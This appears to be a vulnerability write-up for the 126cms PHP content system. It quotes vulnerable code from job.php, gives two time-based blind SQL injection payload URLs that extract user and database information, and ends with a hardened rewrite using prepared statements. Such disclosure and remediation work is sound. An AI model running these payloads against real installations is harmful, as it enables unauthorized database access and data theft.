126cms SQL injection

126cms

Download URL: http://down.admin5.com/php/77014.html

1. Vulnerable file: 126cms/job.php, lines 11 to 22:

if( $job == 'updatehits' ){

    $aid = $_GET['aid'];
    // fetch fid and mid
    $query = "SELECT * FROM `w6_module_content_index` WHERE `id`='".$aid."'";
    $result = mysql_query($query);
    $fid = mysql_result($result,"0","fid");
    $mid = mysql_result($result,"0","mid");

    $query = "SELECT `aid`,`count` FROM `w6_module_content_$mid` WHERE `aid`=$aid";

    $result = mysql_query($query);

Quote characters (' and ") supplied directly in `aid` are escaped, so the first, quoted query cannot be broken out of.

$query = "SELECT `aid`,`count` FROM `w6_module_content_$mid` WHERE `aid`=$aid";

In this second statement, however, `$aid` is interpolated without surrounding single quotes, so no quote character is needed and a time-based blind injection is possible.

SQL injection:

payload:126cms/job.php?job=updatehits&aid=2%20and%20if(user()=current_user(),sleep(0.3),1)

payload:126cms/job.php?job=updatehits&aid=2%20and%20if(mid(database(),1,1)=0x31,sleep(0.2),1)
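A hardened rewrite of the `updatehits` branch, added here as an example and not taken from 126cms: `aid` is allow-listed as a positive integer before either query sees it, and both lookups use bound parameters. It assumes an open mysqli connection in `$conn` (mysqli is used in place of the deprecated mysql_* functions).

```php
<?php
// Added example, not 126cms code. Assumes a mysqli connection in $conn.

function update_hits(mysqli $conn, string $rawAid): ?array
{
    // `aid` is only ever compared against a numeric column, so escaping
    // quotes is not enough when the value is spliced in unquoted (the
    // original bug). Reject anything that is not a positive integer.
    if (!preg_match('/^[1-9][0-9]*$/', $rawAid)) {
        return null;
    }
    $aid = (int) $rawAid;

    // First lookup: fid and mid for this index row, via a bound parameter.
    $stmt = $conn->prepare(
        'SELECT `fid`, `mid` FROM `w6_module_content_index` WHERE `id` = ?'
    );
    $stmt->bind_param('i', $aid);
    $stmt->execute();
    $stmt->bind_result($fid, $mid);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return null;
    }

    // $mid becomes part of a table name and cannot be bound as a parameter,
    // so it is allow-listed to digits before being spliced into the identifier.
    if (!preg_match('/^[0-9]+$/', (string) $mid)) {
        return null;
    }
    $table = 'w6_module_content_' . $mid;

    // Second lookup: same `aid`, now bound instead of interpolated.
    $stmt = $conn->prepare("SELECT `aid`, `count` FROM `{$table}` WHERE `aid` = ?");
    $stmt->bind_param('i', $aid);
    $stmt->execute();
    $stmt->bind_result($rowAid, $count);
    $found = $stmt->fetch();
    $stmt->close();

    return $found ? ['fid' => $fid, 'mid' => $mid, 'aid' => $rowAid, 'count' => $count] : null;
}

if (($_GET['job'] ?? '') === 'updatehits') {
    $content = update_hits($conn, (string) ($_GET['aid'] ?? ''));
}
```

With this check in place, a value such as `2 and if(...,sleep(0.3),1)` never reaches the database at all, so the injection payloads above return nothing instead of a delayed response.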
